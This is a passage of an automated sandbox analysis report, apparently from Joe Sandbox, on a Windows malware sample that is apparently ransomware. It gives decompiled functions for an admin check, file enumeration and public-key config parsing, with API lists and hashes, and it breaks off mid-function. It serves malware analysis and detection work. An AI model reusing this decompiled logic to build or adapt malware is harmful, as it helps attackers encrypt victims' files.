					_t15 = GetProcAddress(GetModuleHandleA("advapi32.dll"), "CheckTokenMembership");
					_t16 =  *_t15(0, _v12,  &_v8);
					asm("sbb eax, eax");
					_v8 = _v8 &  ~_t16;
					FreeSid(_v12);
					return _v8;
				} else {
					return _t13;
				}
			}

0x0f583c79
0x0f583c99
0x0f583ca0
0x0f583ca8
0x0f583cbf
0x0f583cce
0x0f583cd5
0x0f583cd7
0x0f583cda
0x0f583ce6
0x0f583cad
0x0f583cad
0x0f583cad

APIs

AllocateAndInitializeSid.ADVAPI32(00000000,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?), ref: 0F583CA0
GetModuleHandleA.KERNEL32(advapi32.dll), ref: 0F583CB3
GetProcAddress.KERNEL32(00000000,CheckTokenMembership), ref: 0F583CBF
FreeSid.ADVAPI32(?), ref: 0F583CDA

Strings

CheckTokenMembership, xrefs: 0F583CB9
advapi32.dll, xrefs: 0F583CAE

Memory Dump Source

Source File: 00000003.00000002.298114083.000000000F581000.00000020.00000001.01000000.00000006.sdmp, Offset: 0F580000, based on PE: true

Associated: 00000003.00000002.298101480.000000000F580000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.298127638.000000000F58A000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.298139854.000000000F592000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.298147707.000000000F594000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_f580000_mqsmvj.jbxd

Yara matches

Similarity

API ID: AddressAllocateFreeHandleInitializeModuleProc
String ID: CheckTokenMembership$advapi32.dll
API String ID: 3309497720-1888249752
Opcode ID: aacb409969a19091ed48a33c872af9294abd4ed8dd41f605e78c4c680bcc02ae
Instruction ID: 2b1507b6ebf2d3368effc32d115b70a33524dd9144a2034125ae55ac8099ac37
Opcode Fuzzy Hash: aacb409969a19091ed48a33c872af9294abd4ed8dd41f605e78c4c680bcc02ae
Instruction Fuzzy Hash: 5AF03C30A50209BBDB009BF4DD0AFAD7BB8FB04716F100595F900B6281E778662A9B51

Uniqueness

Uniqueness Score: -1.00%

Function 0F586E69 Relevance: 9.0, APIs: 6, Instructions: 48
stringfileCOMMON

Download Yara Rule

C-Code - Quality: 94%

			E0F586E69() {
				intOrPtr* _t34;
				intOrPtr* _t38;
				void* _t40;
				WCHAR* _t46;
				void* _t51;

				do {
					if(lstrcmpW(_t51 - 0x238, ".") != 0 && lstrcmpW(_t51 - 0x238, L"..") != 0) {
						lstrcatW(_t46, _t51 - 0x238);
						if(( *(_t51 - 0x264) & 0x00000010) == 0) {
							 *((intOrPtr*)(_t51 - 0xc)) =  *_t38;
							 *_t38 =  *_t38 + E0F586AB0(_t46, _t51 - 0x264, __eflags, _t40,  *((intOrPtr*)(_t51 + 8)));
							asm("adc [ebx+0x4], edx");
							__eflags =  *((intOrPtr*)(_t38 + 4)) -  *((intOrPtr*)(_t38 + 4));
							if(__eflags <= 0) {
								if(__eflags < 0) {
									L8:
									_t34 =  *((intOrPtr*)(_t51 + 0xc));
									 *_t34 =  *_t34 + 1;
									__eflags =  *_t34;
								} else {
									__eflags =  *((intOrPtr*)(_t51 - 0xc)) -  *_t38;
									if(__eflags < 0) {
										goto L8;
									}
								}
							}
						} else {
							E0F586DF0(lstrcatW(_t46, "\\"), _t46,  *((intOrPtr*)(_t51 - 0x14)),  *((intOrPtr*)(_t51 + 8)),  *((intOrPtr*)(_t51 + 0xc)), _t38);
						}
						 *((short*)( *((intOrPtr*)(_t51 - 0x10)))) = 0;
					}
				} while (FindNextFileW( *(_t51 - 8), _t51 - 0x264) != 0);
				FindClose( *(_t51 - 8));
				return 0;
			}

0x0f586e70
0x0f586e84
0x0f586ea8
0x0f586eb1
0x0f586ee2
0x0f586eed
0x0f586eef
0x0f586ef2
0x0f586ef5
0x0f586ef7
0x0f586f00
0x0f586f00
0x0f586f03
0x0f586f03
0x0f586ef9
0x0f586efc
0x0f586efe
0x00000000
0x00000000
0x0f586efe
0x0f586ef7
0x0f586eb3
0x0f586ec7
0x0f586ecc
0x0f586f10
0x0f586f10
0x0f586f23
0x0f586f2e
0x0f586f3c

APIs

lstrcmpW.KERNEL32(?,0F58FF48,?,?), ref: 0F586E7C
lstrcmpW.KERNEL32(?,0F58FF4C,?,?), ref: 0F586E96
lstrcatW.KERNEL32 ref: 0F586EA8
lstrcatW.KERNEL32 ref: 0F586EB9

Part of subcall function 0F586DF0: lstrlenW.KERNEL32(00000000,00000000,?,?), ref: 0F586E23
Part of subcall function 0F586DF0: lstrcatW.KERNEL32 ref: 0F586E3B
Part of subcall function 0F586DF0: FindFirstFileW.KERNEL32(00000000,?,?,?), ref: 0F586E45

FindNextFileW.KERNEL32(00003000,?,?,?), ref: 0F586F1D
FindClose.KERNEL32(00003000,?,?), ref: 0F586F2E

Memory Dump Source

Source File: 00000003.00000002.298114083.000000000F581000.00000020.00000001.01000000.00000006.sdmp, Offset: 0F580000, based on PE: true

Associated: 00000003.00000002.298101480.000000000F580000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.298127638.000000000F58A000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.298139854.000000000F592000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.298147707.000000000F594000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_f580000_mqsmvj.jbxd

Yara matches

Similarity

API ID: Findlstrcat$Filelstrcmp$CloseFirstNextlstrlen
String ID:
API String ID: 2032009209-0
Opcode ID: 9a09fae8f862e7f6bf8d543c63de2df20a0068f007ce7d4fb94b4b6f7f7cbf47
Instruction ID: 1920c00e65b94681a648855e302fb06c2d088e33f59247a88c7751042cb7cf3a
Opcode Fuzzy Hash: 9a09fae8f862e7f6bf8d543c63de2df20a0068f007ce7d4fb94b4b6f7f7cbf47
Instruction Fuzzy Hash: 7E016D31A0024DAACB21BA60DC48BEE7BB8FF48240F0040A6F905F2111DB359A56DF51

Uniqueness

Uniqueness Score: -1.00%

Function 0F583200 Relevance: 8.8, APIs: 7, Instructions: 73
memorystringCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0F583200(void* __ecx, CHAR* _a4, intOrPtr _a8) {
				char _t5;
				char _t6;
				intOrPtr _t8;
				int _t10;
				CHAR* _t13;
				int _t15;
				void* _t18;
				CHAR* _t21;
				CHAR* _t23;

				_t23 = _a4;
				_t18 = __ecx;
				_t5 =  *_t23;
				if(_t5 == 0) {
					L4:
					_t6 =  *_t23;
					if(_t6 == 0x7d) {
						goto L10;
					} else {
						_t21 = _t23;
						if(_t6 != 0) {
							while( *_t21 != 0x7d) {
								_t21 =  &(_t21[1]);
								if( *_t21 != 0) {
									continue;
								} else {
								}
								goto L12;
							}
							 *_t21 = 0;
						}
						L12:
						_t8 = _a8;
						if(_t8 != 1) {
							if(_t8 == 2) {
								_t10 = lstrlenA(_t23);
								_t13 = HeapAlloc(GetProcessHeap(), 8, _t10 + 1);
								 *(_t18 + 8) = _t13;
								goto L16;
							}
						} else {
							_t15 = lstrlenA(_t23);
							_t13 = HeapAlloc(GetProcessHeap(), 8, _t15 + 1);
							 *(_t18 + 4) = _t13;
							L16:
							if(_t13 != 0) {
								lstrcpyA(_t13, _t23);
							}
						}
						 *_t21 = 0x7d;
						return 1;
					}
				} else {
					while(_t5 != 0x7d) {
						_t23 =  &(_t23[1]);
						if(_t5 == 0x3d) {
							goto L4;
						} else {
							_t5 =  *_t23;
							if(_t5 != 0) {
								continue;
							} else {
								goto L4;
							}
						}
						goto L19;
					}
					L10:
					return 0;
				}
				L19:
			}

0x0f583205
0x0f583208
0x0f58320a
0x0f58320e
0x0f58321f
0x0f58321f
0x0f583223
0x00000000
0x0f583225
0x0f583226
0x0f58322a
0x0f583230
0x0f583235
0x0f583239
0x00000000
0x00000000
0x0f58323b
0x00000000
0x0f583239
0x0f583245
0x0f583245
0x0f583248
0x0f583248
0x0f58324e
0x0f583270
0x0f583273
0x0f583284
0x0f58328a
0x00000000
0x0f58328a
0x0f583250
0x0f583251
0x0f583262
0x0f583268
0x0f58328d
0x0f58328f
0x0f583293
0x0f583293
0x0f58328f
0x0f583299
0x0f5832a5
0x0f5832a5
0x0f583210
0x0f583210
0x0f583214
0x0f583217
0x00000000
0x0f583219
0x0f583219
0x0f58321d
0x00000000
0x00000000
0x00000000
0x00000000
0x0f58321d
0x00000000
0x0f583217
0x0f58323e
0x0f583242
0x0f583242
0x00000000

APIs

lstrlenA.KERNEL32(0F585444,00000000,?,0F585445,?,0F5834BF,0F585445,00000001,0F585445,00000000,00000000,00000000,?,?,0F585444,00000000), ref: 0F583251
GetProcessHeap.KERNEL32(00000008,00000001,?,0F5834BF,0F585445,00000001,0F585445,00000000,00000000,00000000,?,?,0F585444,00000000), ref: 0F58325B
HeapAlloc.KERNEL32(00000000,?,0F5834BF,0F585445,00000001,0F585445,00000000,00000000,00000000,?,?,0F585444,00000000), ref: 0F583262
lstrlenA.KERNEL32(0F585444,00000000,?,0F585445,?,0F5834BF,0F585445,00000001,0F585445,00000000,00000000,00000000,?,?,0F585444,00000000), ref: 0F583273
GetProcessHeap.KERNEL32(00000008,00000001,?,0F5834BF,0F585445,00000001,0F585445,00000000,00000000,00000000,?,?,0F585444,00000000), ref: 0F58327D
HeapAlloc.KERNEL32(00000000,?,0F5834BF,0F585445,00000001,0F585445,00000000,00000000,00000000,?,?,0F585444,00000000), ref: 0F583284
lstrcpyA.KERNEL32(00000000,0F585444,?,0F5834BF,0F585445,00000001,0F585445,00000000,00000000,00000000,?,?,0F585444,00000000), ref: 0F583293

Memory Dump Source

Source File: 00000003.00000002.298114083.000000000F581000.00000020.00000001.01000000.00000006.sdmp, Offset: 0F580000, based on PE: true

Associated: 00000003.00000002.298101480.000000000F580000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.298127638.000000000F58A000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.298139854.000000000F592000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.298147707.000000000F594000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_f580000_mqsmvj.jbxd

Yara matches

Similarity

API ID: Heap$AllocProcesslstrlen$lstrcpy
String ID:
API String ID: 511007297-0
Opcode ID: 09f10d3b3c259155b6958d15611f55180743da09de1cb546d5ae490d8b099b59
Instruction ID: 811f56816fac90b3f697cb9b47ea68c04c6809e84355938d8d5aa19c9def892c
Opcode Fuzzy Hash: 09f10d3b3c259155b6958d15611f55180743da09de1cb546d5ae490d8b099b59
Instruction Fuzzy Hash: 5711E9304041547ED7102F68D548BE67F58FF02B21F944526E8C6FB302C779A4578761

Uniqueness

Uniqueness Score: -1.00%

Function 0F5833E0 Relevance: 7.6, APIs: 5, Instructions: 101
memorystringCOMMON

Download Yara Rule

C-Code - Quality: 97%

			E0F5833E0(int* __ecx, void* __eflags, CHAR* _a4) {
				int* _v8;
				void* _t8;
				char _t10;
				void* _t14;
				void* _t15;
				char _t18;
				char _t19;
				int _t20;
				CHAR* _t23;
				CHAR* _t26;
				CHAR* _t35;
				CHAR* _t40;

				_push(__ecx);
				_t26 = _a4;
				_t37 = __ecx;
				_v8 = __ecx;
				__ecx[3] = _t26;
				_t8 = E0F5832B0(__ecx);
				if(_t8 == 0 || _t8 == 0xffffffff) {
					ExitProcess(0);
				}
				if(E0F583320(__ecx) == 0) {
					 *__ecx = 0;
					_t10 =  *_t26;
					if(_t10 == 0) {
						goto L4;
					} else {
						do {
							if(_t10 == 0x7b) {
								_t26 =  &(_t26[1]);
								_t14 = E0F583190(_t26);
								if(_t14 != 0) {
									_t15 = _t14 - 1;
									if(_t15 == 0) {
										E0F583200(_t37, _t26, 1);
									} else {
										if(_t15 == 1) {
											_t18 =  *_t26;
											_t35 = _t26;
											if(_t18 == 0) {
												L15:
												_t19 =  *_t35;
												if(_t19 != 0x7d) {
													_t40 = _t35;
													if(_t19 != 0) {
														while( *_t40 != 0x7d) {
															_t40 =  &(_t40[1]);
															if( *_t40 != 0) {
																continue;
															} else {
															}
															goto L21;
														}
														 *_t40 = 0;
													}
													L21:
													_t20 = lstrlenA(_t35);
													_t23 = HeapAlloc(GetProcessHeap(), 8, _t20 + 1);
													 *(_v8 + 8) = _t23;
													if(_t23 != 0) {
														lstrcpyA(_t23, _t35);
													}
													 *_t40 = 0x7d;
													_t37 = _v8;
												}
											} else {
												while(_t18 != 0x7d) {
													_t35 =  &(_t35[1]);
													if(_t18 == 0x3d) {
														goto L15;
													} else {
														_t18 =  *_t35;
														if(_t18 != 0) {
															continue;
														} else {
															goto L15;
														}
													}
													goto L25;
												}
											}
										}
									}
								}
							}
							L25:
							_t7 =  &(_t26[1]); // 0x97850fe0
							_t10 =  *_t7;
							_t26 =  &(_t26[1]);
						} while (_t10 != 0);
						return 1;
					}
				} else {
					 *__ecx = 1;
					L4:
					return 1;
				}
			}

0x0f5833e3
0x0f5833e5
0x0f5833e9
0x0f5833eb
0x0f5833ee
0x0f5833f1
0x0f5833f8
0x0f5834db
0x0f5834db
0x0f583410
0x0f583425
0x0f58342b
0x0f58342f
0x00000000
0x0f583431
0x0f583432
0x0f583434
0x0f58343a
0x0f583441
0x0f583444
0x0f58344a
0x0f58344b
0x0f5834ba
0x0f58344d
0x0f58344e
0x0f583450
0x0f583452
0x0f583456
0x0f583467
0x0f583467
0x0f58346b
0x0f58346d
0x0f583471
0x0f583473
0x0f583478
0x0f58347c
0x00000000
0x00000000
0x0f58347e
0x00000000
0x0f58347c
0x0f583480
0x0f583480
0x0f583483
0x0f583484
0x0f583495
0x0f58349e
0x0f5834a3
0x0f5834a7
0x0f5834a7
0x0f5834ad
0x0f5834b0
0x0f5834b0
0x00000000
0x0f583458
0x0f58345c
0x0f58345f
0x00000000
0x0f583461
0x0f583461
0x0f583465
0x00000000
0x00000000
0x00000000
0x00000000
0x0f583465
0x00000000
0x0f58345f
0x0f583458
0x0f583456
0x0f58344e
0x0f58344b
0x0f583444
0x0f5834bf
0x0f5834bf
0x0f5834bf
0x0f5834c2
0x0f5834c3
0x0f5834d6
0x0f5834d6
0x0f583412
0x0f583412
0x0f583418
0x0f583422
0x0f583422

APIs

Part of subcall function 0F5832B0: lstrlenA.KERNEL32(?,00000000,?,0F585444,?,?,0F5833F6,00000000,00000000,?,?,0F585444,00000000), ref: 0F5832C5
Part of subcall function 0F5832B0: lstrlenA.KERNEL32(?,?,0F5833F6,00000000,00000000,?,?,0F585444,00000000,?,?,?,?,0F585615,00000000,popkadurak), ref: 0F5832EE

lstrlenA.KERNEL32(0F585445,0F585445,00000000,00000000,00000000,?,?,0F585444,00000000,?,?,?,?,0F585615,00000000,popkadurak), ref: 0F583484
GetProcessHeap.KERNEL32(00000008,00000001,?,0F585444,00000000,?,?,?,?,0F585615,00000000,popkadurak,00000000,00000000,?,00000000), ref: 0F58348E
HeapAlloc.KERNEL32(00000000,?,0F585444,00000000,?,?,?,?,0F585615,00000000,popkadurak,00000000,00000000,?,00000000), ref: 0F583495
lstrcpyA.KERNEL32(00000000,0F585445,?,0F585444,00000000,?,?,?,?,0F585615,00000000,popkadurak,00000000,00000000,?,00000000), ref: 0F5834A7
ExitProcess.KERNEL32 ref: 0F5834DB

Memory Dump Source

Source File: 00000003.00000002.298114083.000000000F581000.00000020.00000001.01000000.00000006.sdmp, Offset: 0F580000, based on PE: true

Associated: 00000003.00000002.298101480.000000000F580000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.298127638.000000000F58A000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.298139854.000000000F592000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.298147707.000000000F594000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_f580000_mqsmvj.jbxd

Yara matches

Similarity

API ID: lstrlen$HeapProcess$AllocExitlstrcpy
String ID:
API String ID: 1867342102-0
Opcode ID: 2cb9ae02c7b91c7aba9ed2e52654505e02047253668d4aa199c3f186de03da39
Instruction ID: 5393b5967fb15e5b77a6371f14ce5878435e1c365e4656408ba4f444b5118171
Opcode Fuzzy Hash: 2cb9ae02c7b91c7aba9ed2e52654505e02047253668d4aa199c3f186de03da39
Instruction Fuzzy Hash: B3310570504A456AEB223F68C44C7F57F54BB42B10F9841BAE8C5FB2A3D76E68478760

Uniqueness

Uniqueness Score: -1.00%

Function 0F583CF0 Relevance: 7.6, APIs: 5, Instructions: 53COMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 0F583D42
VerSetConditionMask.KERNEL32(00000000,00000000,00000002,00000003), ref: 0F583D66
VerSetConditionMask.KERNEL32(00000000), ref: 0F583D6A
VerSetConditionMask.KERNEL32(00000000), ref: 0F583D6E
VerifyVersionInfoW.KERNEL32 ref: 0F583D95

Memory Dump Source

Source File: 00000003.00000002.298114083.000000000F581000.00000020.00000001.01000000.00000006.sdmp, Offset: 0F580000, based on PE: true

Associated: 00000003.00000002.298101480.000000000F580000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.298127638.000000000F58A000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.298139854.000000000F592000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.298147707.000000000F594000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_f580000_mqsmvj.jbxd

Yara matches

Similarity

API ID: ConditionMask$InfoVerifyVersion_memset
String ID:
API String ID: 3299124433-0
Opcode ID: 5098bf79b92310458a44c74fadc14e4466f8ffa0986609baf8a66ddad1a9261f
Instruction ID: 6c2f69a5d26e00a9762ce04fae090be22d89df6d8b210bb27d6dc0145c04b085
Opcode Fuzzy Hash: 5098bf79b92310458a44c74fadc14e4466f8ffa0986609baf8a66ddad1a9261f
Instruction Fuzzy Hash: 2F1112B0D4031C7EEB619F64DC0ABEA7BBCEB08700F004195A508F61C1D6B95B548FD5

Uniqueness

Uniqueness Score: -1.00%

Function 0F584EA0 Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 116
stringCOMMON

Download Yara Rule

C-Code - Quality: 97%

			E0F584EA0(intOrPtr* __ecx, CHAR* __edx, intOrPtr* _a4) {
				CHAR* _v8;
				char _v12;
				char _v20;
				char _t16;
				char _t20;
				char _t21;
				intOrPtr* _t24;
				intOrPtr _t25;
				intOrPtr _t26;
				intOrPtr* _t29;
				CHAR* _t33;
				intOrPtr _t34;
				intOrPtr _t35;
				void* _t38;
				void* _t41;
				intOrPtr* _t42;
				void* _t47;
				void* _t49;
				intOrPtr* _t51;
				CHAR* _t53;

				asm("movq xmm0, [0xf58faac]");
				_t16 =  *0xf58fab4; // 0x0
				_t29 = _a4;
				_v8 = __edx;
				_t51 = __ecx;
				asm("movq [ebp-0x10], xmm0");
				_v12 = _t16;
				if( *_t29 == 0) {
					L11:
					if(_t51 == 0) {
						goto L10;
					} else {
						if(_v20 == 0) {
							L22:
							if(_t51 == 0) {
								goto L10;
							} else {
								_t53 = _t51 + lstrlenA( &_v20);
								while(1) {
									_t20 =  *_t53;
									if(_t20 >= 0x30 && _t20 <= 0x39) {
										break;
									}
									_t53 =  &(_t53[1]);
								}
								_t33 = _t53;
								while(1) {
									_t21 =  *_t33;
									if(_t21 < 0x30 || _t21 > 0x39) {
										goto L30;
									}
									L31:
									_t33 =  &(_t33[1]);
									continue;
									L30:
									if(_t21 == 0x2e) {
										goto L31;
									}
									 *_t33 = 0;
									return lstrcpyA(_v8, _t53);
									goto L33;
								}
							}
						} else {
							_t34 =  *_t51;
							if(_t34 != 0) {
								_t47 = _t51 -  &_v20;
								do {
									_t24 =  &_v20;
									if(_t34 == 0) {
										L19:
										if( *_t24 == 0) {
											goto L22;
										} else {
											goto L20;
										}
									} else {
										while(1) {
											_t35 =  *_t24;
											if(_t35 == 0) {
												goto L22;
											}
											_t41 =  *((char*)(_t47 + _t24)) - _t35;
											if(_t41 != 0) {
												goto L19;
											} else {
												_t24 = _t24 + 1;
												if( *((intOrPtr*)(_t47 + _t24)) != _t41) {
													continue;
												} else {
													goto L19;
												}
											}
											goto L33;
										}
										goto L22;
									}
									goto L33;
									L20:
									_t34 =  *((intOrPtr*)(_t51 + 1));
									_t51 = _t51 + 1;
									_t47 = _t47 + 1;
								} while (_t34 != 0);
							}
							goto L10;
						}
					}
				} else {
					_t25 =  *__ecx;
					if(_t25 == 0) {
						L10:
						return lstrcpyA(_v8, "fabian wosar <3");
					} else {
						_t49 = __ecx - _t29;
						do {
							_t42 = _t29;
							if(_t25 == 0) {
								L8:
								if( *_t42 == 0) {
									goto L11;
								} else {
									goto L9;
								}
							} else {
								while(1) {
									_t26 =  *_t42;
									if(_t26 == 0) {
										goto L11;
									}
									_t38 =  *((char*)(_t49 + _t42)) - _t26;
									if(_t38 != 0) {
										goto L8;
									} else {
										_t42 = _t42 + 1;
										if( *((intOrPtr*)(_t49 + _t42)) != _t38) {
											continue;
										} else {
											goto L8;
										}
									}
									goto L33;
								}
								goto L11;
							}
							goto L33;
							L9:
							_t25 =  *((intOrPtr*)(_t51 + 1));
							_t51 = _t51 + 1;
							_t49 = _t49 + 1;
						} while (_t25 != 0);
						goto L10;
					}
				}
				L33:
			}

0x0f584ea6
0x0f584eae
0x0f584eb4
0x0f584eb9
0x0f584ebc
0x0f584ec1
0x0f584ec6
0x0f584ec9
0x0f584f1a
0x0f584f1c
0x00000000
0x0f584f1e
0x0f584f22
0x0f584f5f
0x0f584f61
0x00000000
0x0f584f63
0x0f584f6d
0x0f584f70
0x0f584f70
0x0f584f74
0x00000000
0x00000000
0x0f584f7a
0x0f584f7a
0x0f584f7d
0x0f584f80
0x0f584f80
0x0f584f84
0x00000000
0x00000000
0x0f584f8e
0x0f584f8e
0x00000000
0x0f584f8a
0x0f584f8c
0x00000000
0x00000000
0x0f584f95
0x0f584fa4
0x00000000
0x0f584fa4
0x0f584f80
0x0f584f24
0x0f584f24
0x0f584f28
0x0f584f2f
0x0f584f31
0x0f584f31
0x0f584f36
0x0f584f4f
0x0f584f52
0x00000000
0x00000000
0x00000000
0x00000000
0x0f584f38
0x0f584f38
0x0f584f38
0x0f584f3c
0x00000000
0x00000000
0x0f584f45
0x0f584f47
0x00000000
0x0f584f49
0x0f584f49
0x0f584f4d
0x00000000
0x00000000
0x00000000
0x00000000
0x0f584f4d
0x00000000
0x0f584f47
0x00000000
0x0f584f38
0x00000000
0x0f584f54
0x0f584f54
0x0f584f57
0x0f584f58
0x0f584f59
0x0f584f5d
0x00000000
0x0f584f28
0x0f584f22
0x0f584ecb
0x0f584ecb
0x0f584ecf
0x0f584f05
0x0f584f19
0x0f584ed1
0x0f584ed3
0x0f584ed5
0x0f584ed5
0x0f584ed9
0x0f584ef7
0x0f584efa
0x00000000
0x00000000
0x00000000
0x00000000
0x0f584edb
0x0f584ee0
0x0f584ee0
0x0f584ee4
0x00000000
0x00000000
0x0f584eed
0x0f584eef
0x00000000
0x0f584ef1
0x0f584ef1
0x0f584ef5
0x00000000
0x00000000
0x00000000
0x00000000
0x0f584ef5
0x00000000
0x0f584eef
0x00000000
0x0f584ee0
0x00000000
0x0f584efc
0x0f584efc
0x0f584eff
0x0f584f00
0x0f584f01
0x00000000
0x0f584ed5
0x0f584ecf
0x00000000

APIs

lstrcpyA.KERNEL32(?,fabian wosar <3,?,0F5851ED), ref: 0F584F0D
lstrlenA.KERNEL32(00000000,?,0F5851ED), ref: 0F584F67
lstrcpyA.KERNEL32(?,?,?,0F5851ED), ref: 0F584F98

Strings

fabian wosar <3, xrefs: 0F584F05

Memory Dump Source

Source File: 00000003.00000002.298114083.000000000F581000.00000020.00000001.01000000.00000006.sdmp, Offset: 0F580000, based on PE: true

Associated: 00000003.00000002.298101480.000000000F580000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.298127638.000000000F58A000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.298139854.000000000F592000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.298147707.000000000F594000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_f580000_mqsmvj.jbxd

Yara matches

Similarity

API ID: lstrcpy$lstrlen
String ID: fabian wosar <3
API String ID: 367037083-1724090804
Opcode ID: ee5f67d4a8da7a1e21080e4d8712276d4c58a5ef008175b37af3526b31fee9ae
Instruction ID: d9b35829451fd4d31406d3ed64547f20581a92da1a4b9f184b729a44e9cba122
Opcode Fuzzy Hash: ee5f67d4a8da7a1e21080e4d8712276d4c58a5ef008175b37af3526b31fee9ae
Instruction Fuzzy Hash: 493103218082A75ADB22EE2854503FABFA1BF43211F9851EDDCD5BB307D3615447C7D0

Uniqueness

Uniqueness Score: -1.00%

Function 0F583190 Relevance: 6.0, APIs: 2, Strings: 2, Instructions: 42
stringCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0F583190(CHAR* _a4) {
				char _t6;
				CHAR* _t13;
				CHAR* _t16;

				_t13 = _a4;
				_t16 = _t13;
				if( *_t13 == 0) {
					L5:
					lstrcmpiA(_t13, "mask");
					_t10 =  ==  ? 1 : 0;
					lstrcmpiA(_a4, "pub_key");
					 *_t16 = 0x3d;
					_t11 =  ==  ? 2 :  ==  ? 1 : 0;
					_t5 =  ==  ? 2 :  ==  ? 1 : 0;
					return  ==  ? 2 :  ==  ? 1 : 0;
				} else {
					while(1) {
						_t6 =  *_t16;
						if(_t6 == 0x7d) {
							break;
						}
						if(_t6 == 0x3d) {
							 *_t16 = 0;
							goto L5;
						} else {
							_t16 =  &(_t16[1]);
							if( *_t16 != 0) {
								continue;
							} else {
								goto L5;
							}
						}
						goto L8;
					}
					return 0;
				}
				L8:
			}

0x0f583193
0x0f583197
0x0f58319c
0x0f5831b0
0x0f5831b9
0x0f5831ce
0x0f5831d1
0x0f5831d9
0x0f5831e1
0x0f5831e4
0x0f5831e9
0x0f5831a0
0x0f5831a0
0x0f5831a0
0x0f5831a4
0x00000000
0x00000000
0x0f5831a8
0x0f5831ec
0x00000000
0x0f5831aa
0x0f5831aa
0x0f5831ae
0x00000000
0x00000000
0x00000000
0x00000000
0x0f5831ae
0x00000000
0x0f5831a8
0x0f5831f5
0x0f5831f5
0x00000000

APIs

lstrcmpiA.KERNEL32(0F585444,mask,0F585445,?,?,0F583441,0F585445,00000000,00000000,00000000,?,?,0F585444,00000000), ref: 0F5831B9
lstrcmpiA.KERNEL32(0F585444,pub_key,?,0F583441,0F585445,00000000,00000000,00000000,?,?,0F585444,00000000), ref: 0F5831D1

Strings

pub_key, xrefs: 0F5831BF
mask, xrefs: 0F5831B1

Memory Dump Source

Source File: 00000003.00000002.298114083.000000000F581000.00000020.00000001.01000000.00000006.sdmp, Offset: 0F580000, based on PE: true

Associated: 00000003.00000002.298101480.000000000F580000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.298127638.000000000F58A000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.298139854.000000000F592000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.298147707.000000000F594000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_f580000_mqsmvj.jbxd

Yara matches

Similarity

API ID: lstrcmpi
String ID: mask$pub_key
API String ID: 1586166983-1355590148
Opcode ID: 74e08ff8f6eb92781eca81078024d7b71b36a7e29bfee0a36dc9fac493765134
Instruction ID: 85da7ed5d81de2fe1a2b3a3d45e16c5e199c81a0ecb1df7bb91ee0197f6ee925
Opcode Fuzzy Hash: 74e08ff8f6eb92781eca81078024d7b71b36a7e29bfee0a36dc9fac493765134
Instruction Fuzzy Hash: 66F046723082845EF7155A689C457E1BFC8AB45F10F94047FE6CAE6242C2AA98838350

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: mqsmvj.exePID: 476, Parent PID: 3320COMMON

Execution Graph

Execution Coverage:	21.3%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	0%
Total number of Nodes:	680
Total number of Limit Nodes:	12

Callgraph

Executed
Not Executed
Opacity -> Relevance
Disassembly available

Executed Functions

Function 0F585860 Relevance: 109.0, APIs: 55, Strings: 7, Instructions: 458
stringmemoryencryptionCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 82%

			E0F585860(CHAR* __ecx, int __edx, BYTE* _a4, signed int _a8, long* _a12) {
				char _v148;
				char _v152;
				void* _v156;
				int _v160;
				int _v164;
				CHAR* _v172;
				int _v176;
				CHAR* _v184;
				int _v192;
				void* _v196;
				CHAR* _v200;
				CHAR* _v204;
				WCHAR* _v208;
				void* _v212;
				void* _v216;
				signed int _v220;
				short* _v224;
				void* _v228;
				void* _v232;
				void* _v236;
				CHAR* _v240;
				CHAR* _v268;
				void* __esi;
				CHAR* _t134;
				void* _t136;
				int _t146;
				void* _t149;
				int _t150;
				signed int _t151;
				void* _t153;
				int _t159;
				signed int _t167;
				signed int _t171;
				CHAR* _t178;
				int _t179;
				CHAR* _t182;
				void* _t191;
				long _t195;
				void _t210;
				int _t211;
				intOrPtr _t215;
				int _t216;
				char _t217;
				long _t226;
				int _t239;
				char* _t240;
				void* _t244;
				void* _t245;
				void* _t248;
				long _t250;
				signed int _t254;
				CHAR* _t256;
				int _t259;
				int _t260;
